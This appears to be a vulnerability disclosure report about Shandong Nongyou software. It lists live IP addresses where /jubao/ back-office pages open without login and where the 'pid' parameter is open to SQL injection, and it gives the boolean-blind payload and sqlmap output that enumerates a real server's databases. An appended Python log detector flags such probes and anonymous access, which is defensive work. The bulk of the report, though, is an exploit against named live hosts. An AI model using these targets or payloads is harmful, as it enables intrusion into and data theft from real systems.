### Brief description:
As the title says.
### Details:
Shandong Nongyou Software official website: http://www.nongyou.com.cn/
Examples of unauthorized access (越权):
http://221.2.149.47:8100/jubao/left.aspx
http://222.135.109.70:8100/jubao/left.aspx
http://123.134.189.60:8012/jubao/left.aspx
http://218.56.40.229:8020/jubao/left.aspx
http://222.135.127.190:7000/jubao/left.aspx
![1.png](https://images.seebug.org/upload/201412/31180602b11adc51b8947b3f83c81314a76aba91.png)
2. An injection point reachable without authorization:
http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid=
http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid=
2. Testing the injection point: http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
![2.png](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\123.134.189.60'
```
All of the above can be reproduced.
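The two findings above (back-office pages under /jubao/ served without a login, and a boolean-based blind injection in the pid parameter) leave a recognisable trace in web server logs. The following detector is an added example, not code from the report or from the vendor; it runs over constructed IIS W3C-style log lines, assumes the cs-username field reflects the application's logged-in user (under ASP.NET forms authentication it often stays "-", so a real deployment would key on the session cookie instead), and flags both anonymous hits on protected pages and the tautology/contradiction pairs that boolean-blind probing produces.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not taken from the report). Field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
SAMPLE_LOG = """\
2014-12-31 18:13:11 10.0.0.5 GET /jubao/left.aspx - 8012 - 203.0.113.9 200
2014-12-31 18:13:12 10.0.0.5 GET /jubao/StatisticalAnalysisChart.aspx pid='+AND+5349%3D5349+AND+'QMWz'%3D'QMWz 8012 - 203.0.113.9 200
2014-12-31 18:13:13 10.0.0.5 GET /jubao/StatisticalAnalysisChart.aspx pid='+AND+5349%3D5350+AND+'QMWz'%3D'QMWz 8012 - 203.0.113.9 302
2014-12-31 18:14:00 10.0.0.5 GET /jubao/StatisticalAnalysisChart.aspx pid=17 8012 admin 198.51.100.4 200
2014-12-31 18:14:05 10.0.0.5 GET /Login.aspx - 8012 - 198.51.100.4 200
"""

# Everything under /jubao/ is a back-office view that should require a login (assumption).
PROTECTED_PREFIX = "/jubao/"
# Boolean-blind probes pair a true and a false condition such as 5349=5349 / 5349=5350.
BOOLEAN_BLIND = re.compile(r"""['"]?\s*(and|or)\s+\d+\s*=\s*\d+""", re.IGNORECASE)


def parse_line(line):
    """Split one W3C log line into the fields the detector needs; None if malformed."""
    f = line.split(" ")
    if len(f) < 10:
        return None
    return {"time": f[0] + " " + f[1], "stem": f[4], "query": unquote_plus(f[5]),
            "user": f[7], "client": f[8], "status": f[9]}


def classify(rec):
    """Return the list of finding labels for one parsed request (empty if benign)."""
    findings = []
    if rec["stem"].lower().startswith(PROTECTED_PREFIX) and rec["user"] == "-":
        findings.append("unauthenticated_backoffice_access")
    if BOOLEAN_BLIND.search(rec["query"]):
        findings.append("boolean_blind_sqli_probe")
    return findings


def scan(log_text):
    """Yield (client ip, uri stem, labels) for every log line that raises a finding."""
    results = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None and classify(rec):
            results.append((rec["client"], rec["stem"], classify(rec)))
    return results


if __name__ == "__main__":
    for client, stem, labels in scan(SAMPLE_LOG):
        print(client, stem, ", ".join(labels))
```

Two probes with the same structure but different truth values from one client within seconds is the signature to alert on; a single match on its own is only a hint.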
### Vulnerability proof:
2. Testing the injection point: http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
![2.png](https://images.seebug.org/upload/201412/31181456e6cefefa99dcaac2c413058440933bf8.png)